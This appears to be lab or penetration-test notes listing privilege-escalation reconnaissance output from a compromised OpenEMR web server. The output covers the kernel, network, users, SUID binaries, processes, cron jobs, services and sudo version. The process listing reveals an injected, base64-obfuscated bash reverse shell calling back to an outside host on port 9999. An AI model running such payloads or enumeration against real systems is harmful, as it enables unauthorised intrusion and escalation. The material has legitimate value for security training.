System/Kernel
www-data@APEX:/var/www/openemr/interface/main$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped
Linux APEX 4.15.0-143-generic #147-Ubuntu SMP Wed Apr 14 16:10:11 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic64-bit
Ubuntu 18.04.5 LTS (Bionic Beaver)
4.15.0-143-generic
Networks
www-data@APEX:/var/www/openemr/interface/main$ ip route ; arp -a
default via 192.168.196.254 dev ens192 proto static
192.168.196.0/24 dev ens192 proto kernel scope link src 192.168.196.145
_gateway (192.168.196.254) at 00:50:56:9e:fc:4d [ether] on ens192www-data@APEX:/var/www/openemr/interface/main$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 141 192.168.196.145:55688 192.168.45.215:9999 ESTABLISHED 3102/bash
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 192.168.196.255:137 0.0.0.0:* -
udp 0 0 192.168.196.145:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 192.168.196.255:138 0.0.0.0:* -
udp 0 0 192.168.196.145:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* - 0 0.0.0.0:22
Users & Groups
www-data@APEX:/var/www/openemr/interface/main$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
white:x:1000:1000::/home/white:/bin/sh
total 12K
4.0K drwxr-xr-x 2 white white 4.0K May 17 2021 white
4.0K drwxr-xr-x 3 root root 4.0K May 17 2021 .
4.0K drwxr-xr-x 23 root root 4.0K May 17 2021 ..white
www-data@APEX:/var/www/openemr/interface/main$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(mysql) gid=115(mysql) groups=115(mysql)
uid=1000(white) gid=1000(white) groups=1000(white)SUIDs
www-data@APEX:/var/www/openemr/interface/main$ find / -perm -04000 -ls -type f 2>/dev/null
267552 100 -rwsr-xr-x 1 root root 100760 Nov 22 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
262636 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
792461 112 -rwsr-xr-x 1 root root 113528 Feb 2 2021 /usr/lib/snapd/snap-confine
266445 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
262569 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
277605 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
265285 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
265282 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
263817 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
265284 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
277604 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
265430 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
262423 148 -rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
265281 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
275555 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
266192 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
266190 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
265155 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
262177 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su 265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
SGIDs
www-data@APEX:/var/www/openemr/interface/main$ find / -type f -perm -02000 -ls 2>/dev/null
409436 12 -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
276916 44 -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
266374 356 -rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
275510 16 -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
265280 72 -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
262311 40 -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
265283 24 -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
263772 32 -rwxr-sr-x 1 root tty 30800 Sep 16 2020 /usr/bin/wall
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
524296 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/pam_extrausers_chkpwd
524315 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/unix_chkpwdProcesses
www-data@APEX:/var/www/openemr/interface/main$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.8 159604 8632 ? Ss 17:31 0:01 /sbin/init
root 502 0.0 0.8 94672 8728 ? S<s 17:31 0:00 /lib/systemd/systemd-journald
root 517 0.0 0.1 97716 1744 ? Ss 17:31 0:00 /sbin/lvmetad -f
root 528 0.0 0.5 47216 5636 ? Ss 17:31 0:00 /lib/systemd/systemd-udevd
systemd+ 621 0.0 0.2 215520 2864 ? Ssl 17:31 0:00 /lib/systemd/systemd-timesyncd
systemd+ 676 0.0 0.4 70496 4676 ? Ss 17:31 0:00 /lib/systemd/systemd-resolved
root 739 0.0 0.9 91164 10032 ? Ss 17:31 0:00 /usr/bin/VGAuthService
root 741 0.0 0.6 227056 6720 ? S<sl 17:31 0:06 /usr/bin/vmtoolsd
root 750 0.0 0.1 604848 1816 ? Ssl 17:31 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
daemon 752 0.0 0.2 28340 2160 ? Ss 17:31 0:00 /usr/sbin/atd -f
root 756 0.0 0.2 31328 2548 ? Ss 17:31 0:00 /usr/sbin/cron -f
syslog 759 0.0 0.4 263044 4576 ? Ssl 17:31 0:00 /usr/sbin/rsyslogd -n
root 760 0.0 0.5 61996 5524 ? Ss 17:31 0:00 /lib/systemd/systemd-logind
root 761 0.0 0.6 287552 6144 ? Ssl 17:31 0:00 /usr/lib/accountsservice/accounts-daemon
message+ 764 0.0 0.4 50056 4148 ? Ss 17:31 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 806 0.0 1.5 170400 15564 ? Ssl 17:31 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 815 0.0 1.7 187128 18128 ? Ssl 17:31 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 832 0.0 0.6 288888 6320 ? Ssl 17:31 0:00 /usr/lib/policykit-1/polkitd --no-debug
mysql 1009 0.1 14.2 717740 143996 ? Ssl 17:31 0:15 /usr/sbin/mysqld
root 1228 0.0 1.0 265360 10120 ? Ss 17:33 0:00 /usr/sbin/nmbd --foreground --no-process-group
root 1277 0.0 0.5 72308 5480 ? Ss 17:33 0:00 /usr/sbin/sshd -D
root 1302 0.0 0.1 16188 1576 tty1 Ss+ 17:33 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1324 0.0 1.9 492324 20012 ? Ss 17:33 0:00 /usr/sbin/apache2 -k start
systemd+ 1666 0.0 0.3 71720 3476 ? Ss 17:34 0:00 /lib/systemd/systemd-networkd
root 1903 0.0 1.8 356708 18252 ? Ss 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1927 0.0 0.5 344956 5832 ? S 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1928 0.0 0.4 344980 4588 ? S 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1943 0.0 0.6 356692 6596 ? S 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
www-data 2842 0.0 3.5 502236 35912 ? S 20:46 0:00 /usr/sbin/apache2 -k start
www-data 2933 0.0 2.9 498348 30256 ? S 20:46 0:00 /usr/sbin/apache2 -k start
www-data 2968 0.0 3.0 498252 31180 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2969 0.0 3.1 498288 31876 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2970 0.0 2.7 497708 27740 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2971 0.0 3.4 498428 34468 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2980 0.0 3.1 497736 31812 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2981 0.0 3.0 498188 30768 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2982 0.0 3.4 498224 34336 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2985 0.0 3.3 498288 33464 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 3097 0.0 0.0 4636 848 ? S 21:10 0:00 sh -c faxstat -r -l -h || echo YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMjE1Lzk5OTkgMD4mMSI=|base64 -d|bash
www-data 3100 0.0 0.1 18384 1916 ? S 21:10 0:00 bash
www-data 3101 0.0 0.1 18384 1924 ? S 21:10 0:00 bash -c /bin/bash -i >& /dev/tcp/192.168.45.215/9999 0>&1
www-data 3102 0.0 0.2 18516 2924 ? S 21:10 0:00 /bin/bash -i
www-data 3322 0.0 0.3 36708 3268 ? R 21:25 0:00 ps -auxwwwroot 750 0.0 0.1 604848 1816 ? Ssl 17:31 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 756 0.0 0.2 31328 2548 ? Ss 17:31 0:00 /usr/sbin/cron -f
root 832 0.0 0.6 288888 6320 ? Ssl 17:31 0:00 /usr/lib/policykit-1/polkitd --no-debug
mysql 1009 0.1 14.2 717740 143996 ? Ssl 17:31 0:15 /usr/sbin/mysqld
Cron & Systemd
www-data@APEX:/var/www/openemr/interface/main$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Wed 2025-02-05 21:39:00 EST 11min left Wed 2025-02-05 21:09:02 EST 18min ago phpsessionclean.timer phpsessionclean.service
Wed 2025-02-05 22:22:49 EST 55min left Wed 2025-02-05 17:34:02 EST 3h 53min ago apt-daily.timer apt-daily.service
Thu 2025-02-06 03:04:00 EST 5h 36min left Wed 2025-02-05 17:33:59 EST 3h 53min ago ua-messaging.timer ua-messaging.service
Thu 2025-02-06 06:57:31 EST 9h left Wed 2025-02-05 17:34:03 EST 3h 53min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2025-02-06 08:17:57 EST 10h left Wed 2025-02-05 17:33:59 EST 3h 53min ago motd-news.timer motd-news.service
Thu 2025-02-06 17:47:02 EST 20h left Wed 2025-02-05 17:47:02 EST 3h 40min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2025-02-10 00:00:00 EST 4 days left Wed 2025-02-05 17:33:59 EST 3h 53min ago fstrim.timer fstrim.service
7 timers listed.
Pass --all to see loaded but inactive timers, too.Services
www-data@APEX:/var/www/openemr/interface/main$ syssystemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
apache2.service loaded active running The Apache HTTP Server
atd.service loaded active running Deferred execution scheduler
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
lxcfs.service loaded active running FUSE filesystem for LXC
mariadb.service loaded active running MariaDB 10.1.48 database server
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
nmbd.service loaded active running Samba NMB Daemon
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
smbd.service loaded active running Samba SMB Daemon
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
34 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.Sudo Version
www-data@APEX:/var/www/openemr/interface/main$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2Sudo version 1.8.21p2
Glibc Version
www-data@APEX:/var/www/openemr/interface/main$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27